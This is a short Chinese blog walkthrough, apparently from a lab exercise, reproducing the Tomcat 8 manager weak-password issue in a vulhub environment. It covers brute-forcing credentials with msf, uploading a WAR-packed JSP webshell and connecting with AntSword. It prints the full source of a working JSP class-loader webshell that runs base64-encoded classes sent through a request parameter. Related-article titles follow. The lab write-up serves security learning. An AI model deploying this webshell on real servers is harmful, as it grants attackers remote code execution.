vulhub Tomcat8漏洞复现

搭建一下Tomcat8这个漏洞的环境

查看端口发现是8080端口开放

可以看到环境已经搭建好了

尝试登录问题页面,发现需要输入密码http://...:8080/manager/html

用msf

得到弱口令

成功登入后台

此处可上传文件,尝试上传webshell

上传jsp一句话木马,打包为war格式

上传出现报错,403是无权访问不代表没有

发现已经上传上去了

访问该目录,未找到shell.jsp

尝试用命令去打包war包,再次访问,成功

利用蚁剑去连接

 <%!class U extends ClassLoader {U(ClassLoader c) {super(c);}public Class g(byte[] b) {return super.defineClass(b, 0, b.length);}}public byte[] base64Decode(String str) throws Exception {try {Class clazz = Class.forName("sun.misc.BASE64Decoder");return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);} catch (Exception e) {Class clazz = Class.forName("java.util.Base64");Object decoder = clazz.getMethod("getDecoder").invoke(null);return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);}}%><%String cls = request.getParameter("passwd");if (cls != null) {new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);}%>
#一句话木马

vulhub Tomcat8漏洞复现相关推荐

  1. [Vulhub] Weblogic 漏洞复现

    文章目录 Weblogic 常规渗透测试环境 0x00 测试环境 0x01 弱口令 0x02 任意文件读取漏洞的利用 0x03 后台上传webshell Weblogic WLS Core Compo ...

  2. vulhub中漏洞复现1

    CVE-2018-18778 CVE-2018-18778是基于mini_httpd的一个任意文件读取漏洞 Mini_httpd是一个微型的Http服务器,在占用系统资源较小的情况下可以保持一定程度的 ...

  3. docker kali安装mysql_kali安装docker(有效详细的教程) ——vulhub漏洞复现 001

    前记: 博主有着多次安装docker的丰富经验,曾经为了在kali成功安装docker花费不少时间.在kali2016.3一直到最新的kali2019.4都通吃!所以跟着下面的步骤走,绝对不会出错.( ...

  4. 【vulhub】Apereo CAS 4.1 反序列化命令执行漏洞复现

    楼主困了,这里就直接写上楼主自己的一些操作 详细过程可以看Apereo CAS 4.1 反序列化命令执行漏洞复现 特征: 1.网站根目录下有cas目录 2.如图所示,有apereo CAS图标 3.如 ...

  5. Vulhub靶场之struts2漏洞复现

    简介 struts2漏洞中属s2系列杀伤力最大,可以造成远程命令执行漏洞. Apache Struts2框架是一个用于开发Java EE网络应用程序的Web框架.Apache Struts于2020年 ...

  6. 【Vulhub】Apache Log4j Server 反序列化命令执行漏洞复现(CVE-2017-5645)

    脚本小子上线啦,开始复现以前出现实战环境的漏洞了,我会记录一些复现的漏洞(不会是全部),今天这个漏洞的原理我也不太会就知道是个Java反序列化的洞,只负责复现(脚本小子~). 漏洞介绍&环境搭 ...

  7. vulhub中Spring之CVE-2017-8046漏洞复现

    vulhub中Spring之CVE-2017-8046漏洞复现 Spring Data Rest 远程命令执行漏洞(CVE-2017-8046) 漏洞复现 漏洞说明 漏洞利用条件和方式 漏洞影响范围 ...

  8. 渗透测试-----信息收集(概述、whois、子域名查询、爆破、vulhub域名传送漏洞复现、kali安装docker)

    文章目录 渗透测试 信息收集 1. 概述 2. 供练手的网站 3. whois查询 4. 子域名查询 域传送漏洞 1. 概述 2. 解决办法 3. vulhub漏洞复现 4. 子域名爆破 渗透测试 信 ...

  9. tomcat8弱口令漏洞复现与getshell

    目录 一.环境搭建 1.下载vulhub 2.启动环境 二.漏洞复现 1.使用默认用户名密码tomcat:tomcat登录http://your-ip:8080/manager/html 2.上传we ...

  10. (一)vulhub专栏:FastJson1.2.24、1.2.27漏洞复现

    入职大厂必会 写在前面的话:请注意本篇博客最后面的附(注意java版本),本篇博客采用的是LDAP服务getshell,rmi同理.阅读本篇博客需了解fastjson,ldap,rmi. 启动靶场 在 ...

最新文章

  1. Python GuidLine(python编程规范) PEP8
  2. nyoj------203三国志
  3. 无线节能组的充电问题
  4. 介绍一种很棒的wince 如何替换系统声音的方法
  5. 容器监控实践—Heapster
  6. 20211130 正定矩阵的几个不等式
  7. ASP.NET Core Web API中使用Swagger
  8. [Java基础]获取Class类的对象
  9. hdu1695 GCD(莫比乌斯反演)
  10. 认识常见的显卡外接口
  11. java学习之道 --- 如何学习java?
  12. 把linux,ssh客户端蓝色变成绿色
  13. DNS测试 nslookup
  14. 第一位让我敬佩的学者张维迎
  15. Java实现合并word文档并打开合并后文档
  16. AJAX实现页面登录及注册用户名验证
  17. RHCE6.0那点事----仅供参考
  18. android上传sd卡文件格式,Android开发学习:向模拟器的sdcard中添加文件
  19. 我国卫星导航工程将推动“羲和系统”建设
  20. 网传国内互联网梯队划分,网友坐不住了!

热门文章

  1. 【Ansys Workbench】—直接优化
  2. webstorm小程序插件和中文插件
  3. 线性规划问题的求解——Excel和python编程
  4. 用pod安装swiftyJson的一个实例
  5. con 元器件符号_protues的元件符号名称
  6. 打印机打印字体轻,像针式的故障处理(图)
  7. java与工业控制_JAVA工业控制系统方案
  8. 在使用vue-video-player时,切换页面浏览器报错:TypeError: this.el_.vjs_getProperty is not a function**
  9. 工具篇:金蝶K3工具下载
  10. 渗透测试常用端口利用总结